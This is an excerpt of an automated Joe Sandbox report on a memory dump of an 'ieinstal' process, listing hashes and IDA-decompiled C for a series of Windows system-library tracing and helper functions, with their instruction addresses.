Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
Instruction ID: f430c4081b12d9f6a613a11bb4f4d61611e636a38a770a399ccc2a8bf4b373e2
Opcode Fuzzy Hash: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
Instruction Fuzzy Hash: C101F536101B45AFD722D7A7D920A57B3E9FFC0610F01891AAD568B550EB70F401CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F07EFD3 Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E1F07EFD3(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1f0bb370 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1F008F40( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E1EFD3C40() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x1f07efd3
0x1f07efd3
0x1f07efe2
0x1f07efec
0x1f07eff1
0x1f07eff3
0x1f07effe
0x1f07f004
0x1f07f00c
0x1f07f00f
0x1f07f012
0x1f07f01d
0x1f07f02f
0x1f07f01f
0x1f07f028
0x1f07f028
0x1f07f03a
0x1f07f03b
0x1f07f03d
0x1f07f042
0x1f07f055

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a7c1283b852bda0e57d510d183f079d4f2d0cd18820eda7d8894062df19fc7
Instruction ID: 0eef49ce2f74272483ce6958581a85be5175218714eb53fa129b510021a07e78
Opcode Fuzzy Hash: b0a7c1283b852bda0e57d510d183f079d4f2d0cd18820eda7d8894062df19fc7
Instruction Fuzzy Hash: 53015E74A01358AFDB04EF69D845FAEBBF8EF44754F40406AB910EB380DA74EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EFDDF36 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFDDF36(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E1EFD3C40() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E1F040227(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x1efddf43
0x1efddf45
0x1efddf47
0x1efddf4c
0x1f0190e9
0x00000000
0x00000000
0x1f0190f8
0x1efddf57
0x1efddf5a
0x1f019102
0x1f01910f
0x00000000
0x00000000
0x1f01911c
0x1f01912e
0x1f01911e
0x1f019127
0x1f019127
0x1f019136
0x00000000
0x00000000
0x00000000
0x1f019147
0x1efddf63
0x1efddf63
0x1efddf63
0x1efddf52
0x1efddf52
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
Instruction ID: c9b3a382153c1fa52f90e2f19881efd064f1dfcdd88f697b6b35a35b1b54973b
Opcode Fuzzy Hash: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
Instruction Fuzzy Hash: CB0178726486849FE312C719D968F267BEDFB45B58F1902A1FD09CFA91D629E880C220

Uniqueness

Uniqueness Score: -1.00%

Function 1F07EEE7 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1F07EEE7(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t17;
				signed char* _t18;
				intOrPtr _t24;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;

				_t29 = __edx;
				_t24 = __ebx;
				_v8 =  *0x1f0bb370 ^ _t36;
				_t31 = __edx;
				_t34 = __ecx;
				E1F008F40( &_v52, 0, 0x2c);
				_v20 = _t34;
				_v46 = 0x1039;
				_v16 = _t31;
				_v12 = _a4;
				_t17 = E1EFD3C40();
				_t32 = _t30;
				_t35 = _t33;
				if(_t17 == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t24, _v8 ^ _t36, _t29, _t32, _t35);
			}

0x1f07eee7
0x1f07eee7
0x1f07eef6
0x1f07ef00
0x1f07ef05
0x1f07ef07
0x1f07ef11
0x1f07ef17
0x1f07ef1e
0x1f07ef21
0x1f07ef24
0x1f07ef29
0x1f07ef2a
0x1f07ef2d
0x1f07ef3f
0x1f07ef2f
0x1f07ef38
0x1f07ef38
0x1f07ef4a
0x1f07ef4b
0x1f07ef4d
0x1f07ef52
0x1f07ef63

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f31e64d6788fb535bce4a4618d468bf65ed23c075a3f95e632c25c6bbbb0649
Instruction ID: 47439e7442b810374ca7fce456423d784c713015b064c14c1dd9cfbdb045ba5d
Opcode Fuzzy Hash: 6f31e64d6788fb535bce4a4618d468bf65ed23c075a3f95e632c25c6bbbb0649
Instruction Fuzzy Hash: E8018475A01358EFDB10EBA5D845FAFBBB8EF44744F044066F900EB280DA74E901C794

Uniqueness

Uniqueness Score: -1.00%

Function 1F07DA30 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1F07DA30(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1F008F40( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f07da30
0x1f07da30
0x1f07da3f
0x1f07da49
0x1f07da4e
0x1f07da50
0x1f07da5b
0x1f07da63
0x1f07da66
0x1f07da69
0x1f07da74
0x1f07da86
0x1f07da76
0x1f07da7f
0x1f07da7f
0x1f07da91
0x1f07da92
0x1f07da94
0x1f07da99
0x1f07daac

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbd49b6bd9209600c7984477b7b929a79622113f70d630738daa44fb7ac91b3
Instruction ID: f75d5405734154d1dd49aa46735a135e8351e2b8cedbd208bc840c1fd1e47b5a
Opcode Fuzzy Hash: 1cbd49b6bd9209600c7984477b7b929a79622113f70d630738daa44fb7ac91b3
Instruction Fuzzy Hash: 8401A275A01348AFDB14DBA9D855FAEBBF8EF44744F044066F900EB280DE74EA01C798

Uniqueness

Uniqueness Score: -1.00%

Function 1F07DAAF Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1F07DAAF(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1F008F40( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f07daaf
0x1f07daaf
0x1f07dabe
0x1f07dac8
0x1f07dacd
0x1f07dacf
0x1f07dada
0x1f07dae2
0x1f07dae5
0x1f07dae8
0x1f07daf3
0x1f07db05
0x1f07daf5
0x1f07dafe
0x1f07dafe
0x1f07db10
0x1f07db11
0x1f07db13
0x1f07db18
0x1f07db2b

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc2e9de9d304dbe0ba63b1196c70032d6869499477231bf175e9a3f912f371b
Instruction ID: 199f5300e411356c7a09c3eeea21bf8592dff795c52f86e31a2f712657bde938
Opcode Fuzzy Hash: dfc2e9de9d304dbe0ba63b1196c70032d6869499477231bf175e9a3f912f371b
Instruction Fuzzy Hash: 9F017C75A01208ABDB14DBA9D855FAEBBF8EB44744F014066F900AB280DA74EA01C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 1F094AE8 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1F094AE8(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t21;
				signed int _t35;

				_t32 = __edx;
				_v8 =  *0x1f0bb370 ^ _t35;
				_t34 = _a8;
				_t33 = _a12;
				_v28 = _a4;
				_v62 = 0x1c24;
				_v36 = __ecx;
				_v32 = __edx;
				_v24 = _a8;
				_v20 = _a12;
				_v16 = _a16;
				if(E1EFD3C40() == 0) {
					_t21 = 0x7ffe0386;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x18);
				_push(0x403);
				_push( *_t21 & 0x000000ff);
				return E1F004B50(E1F002F90(), 0x1c24, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x1f094ae8
0x1f094af7
0x1f094aff
0x1f094b08
0x1f094b0b
0x1f094b11
0x1f094b15
0x1f094b18
0x1f094b1b
0x1f094b1e
0x1f094b21
0x1f094b2b
0x1f094b3d
0x1f094b2d
0x1f094b36
0x1f094b36
0x1f094b48
0x1f094b49
0x1f094b4b
0x1f094b50
0x1f094b64

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8c74d523e62adfd8e17b246d6135af5f7510575fa4366d7549d17495c68dc1
Instruction ID: 9d1a5ce257754d7f007458836ccd630e4699a7f6916e54e93699507d2ff6c136
Opcode Fuzzy Hash: cd8c74d523e62adfd8e17b246d6135af5f7510575fa4366d7549d17495c68dc1
Instruction Fuzzy Hash: 3E0129B5A00219EBDB04DFA9D940A9EB7F8FF48744F11446AE914E7340E774EA008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1EFDDD4D Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFDDD4D(signed short* __ebx, intOrPtr __esi) {
				signed char _t16;
				signed short* _t21;
				intOrPtr _t26;
				void* _t27;

				_t26 = __esi;
				_t21 = __ebx;
				if(E1EFD3C40() != 0) {
					_t16 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a) & 0x000000ff;
				} else {
					_t16 =  *0x7ffe0384 & 0x000000ff;
				}
				if(_t16 != 0) {
					_t16 =  *[fs:0x30];
					if(( *(_t16 + 0x240) & 0x00000004) != 0) {
						if(E1EFD3C40() == 0) {
							_t16 =  *0x7ffe0385 & 0x000000ff;
						} else {
							_t16 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b) & 0x000000ff;
						}
						if((_t16 & 0x00000020) != 0) {
							_t16 = E1F040227(0x1496, _t26, 0xffffffff, 0xffffffff, _t21, _t21);
						}
					}
				}
				if( *((intOrPtr*)(_t27 - 0x24)) != _t21) {
					L7:
					return E1EFFC98F(0xc0000142, 0x1496,  *((intOrPtr*)(_t27 + 8)), _t21);
				} else {
					if( *((char*)(_t27 - 0x19)) == 0) {
						if( *((intOrPtr*)(_t27 + 8)) != 1) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						L5:
						return _t16;
					}
				}
			}

0x1efddd4d
0x1efddd4d
0x1efddd54
0x1f02951e
0x1efddd5a
0x1efddd5a
0x1efddd5a
0x1efddd63
0x1f02952a
0x1f029537
0x1f029544
0x1f029558
0x1f029546
0x1f02954f
0x1f02954f
0x1f029561
0x1f029574
0x1f029574
0x1f029561
0x1f029537
0x1efddd6c
0x1efddd7b
0x1efddd8e
0x1efddd6e
0x1efddd72
0x1efddd79
0x00000000
0x00000000
0x00000000
0x00000000
0x1efddd74
0x1efddd74
0x1efddd74
0x1efddd74
0x1efddd72

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
Instruction ID: b67b6e2735df4a57ff72f89acf14472da94904dbd7f78fa0dd93d1b7a83f01e4
Opcode Fuzzy Hash: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
Instruction Fuzzy Hash: B0012238A042E49FDB128F208060BA83FE9BB01794F5903E5EC168B1E1D329D844C230

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEBF93 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E1EFEBF93(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t33;

				_push(__ecx);
				_t20 = __edx;
				_v8 = __ecx;
				_t30 = 1 << __edx + 4;
				_t33 = E1EFD5D90(__edx + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
				if(_t33 != 0) {
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					if(1 != 0) {
						_t7 = _t33 + 4; // 0x4
						E1F008F40(_t7, 0, _t30 << 2);
					}
					 *((intOrPtr*)(_v8 + _t20 * 4)) = _t33;
				}
				return _t33;
			}

0x1efebf98
0x1efebf9c
0x1efebf9e
0x1efebfa7
0x1efebfc1
0x1efebfc5
0x1efebfc9
0x1efebfcb
0x1efebfd0
0x1efebfd4
0x1efebfdd
0x1efebfe2
0x1efebfe8
0x1efebfe8
0x1efebff1

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e10a5218078d2c3776e346541d76410ead4ae5945feded31aad0990dad08442
Instruction ID: 7a0c76dfac094491165488fda046cb60e2edb99f71dc19f7a5a5ef2cb04d04f5
Opcode Fuzzy Hash: 1e10a5218078d2c3776e346541d76410ead4ae5945feded31aad0990dad08442
Instruction Fuzzy Hash: 93F0C8B2600614ABD324CF4DDC50E67B7EADBC0A90F058129A945C7210E630ED04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F094C59 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F094C59(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c22;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), 0x1c22, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f094c59
0x1f094c68
0x1f094c70
0x1f094c79
0x1f094c7c
0x1f094c80
0x1f094c83
0x1f094c86
0x1f094c89
0x1f094c8c
0x1f094c96
0x1f094ca8
0x1f094c98
0x1f094ca1
0x1f094ca1
0x1f094cb3
0x1f094cb4
0x1f094cb6
0x1f094cbb
0x1f094ccf

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1791197baff348007c3e8b4ae081f25de77b36cc0c2adbbecf9fd6fd3dca85c
Instruction ID: 0f8da7556a95304ce4bc40430b5025e817d76ae1f8528996fcd5cc4a2a4199cc
Opcode Fuzzy Hash: a1791197baff348007c3e8b4ae081f25de77b36cc0c2adbbecf9fd6fd3dca85c
Instruction Fuzzy Hash: A90121B5A102189FDB00DF69D941ADEB7F8FF48754F51405AF904F7340D674A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1F094CD2 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F094CD2(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c23;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x403);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), 0x1c23, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f094cd2
0x1f094ce1
0x1f094ce9
0x1f094cf2
0x1f094cf5
0x1f094cf9
0x1f094cfc
0x1f094cff
0x1f094d02
0x1f094d05
0x1f094d0f
0x1f094d21
0x1f094d11
0x1f094d1a
0x1f094d1a
0x1f094d2c
0x1f094d2d
0x1f094d2f
0x1f094d34
0x1f094d48

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590a4d4d1d66f6d249e2801d7bcfffe50d3255d832f3b70fe9eacc6b78473610
Instruction ID: 375ae3994cd319e97a8cf58320676d7227632ee15edbb55112123c8b6e6a2b09
Opcode Fuzzy Hash: 590a4d4d1d66f6d249e2801d7bcfffe50d3255d832f3b70fe9eacc6b78473610
Instruction Fuzzy Hash: 3E0121B9A013189FDB00DFA9D951ADEBBF8FF48754F11405AF914E7340E674AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1F094B67 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F094B67(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c21;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x403);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), 0x1c21, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f094b67
0x1f094b76
0x1f094b7e
0x1f094b87
0x1f094b8a
0x1f094b8e
0x1f094b91
0x1f094b94
0x1f094b97
0x1f094b9a
0x1f094ba4
0x1f094bb6
0x1f094ba6
0x1f094baf
0x1f094baf
0x1f094bc1
0x1f094bc2
0x1f094bc4
0x1f094bc9
0x1f094bdd

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9218a74be97eba4fdaa6260391bd81ddc33c5f68f497540d2fb9ec6f5e0e7c24
Instruction ID: c62f880190f1115d355e28bec1ca294796f1d632c6800e04ebd5eb759e14edb5
Opcode Fuzzy Hash: 9218a74be97eba4fdaa6260391bd81ddc33c5f68f497540d2fb9ec6f5e0e7c24
Instruction Fuzzy Hash: 390121B5A00218DFDB00DFA9D991ADEBBF8FF48754F15446AF904E7340E634EA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1F094BE0 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F094BE0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1f0bb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1f094be0
0x1f094bef
0x1f094bf7
0x1f094c00
0x1f094c03
0x1f094c07
0x1f094c0a
0x1f094c0d
0x1f094c10
0x1f094c13
0x1f094c1d
0x1f094c2f
0x1f094c1f
0x1f094c28
0x1f094c28
0x1f094c3a
0x1f094c3b
0x1f094c3d
0x1f094c42
0x1f094c56

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

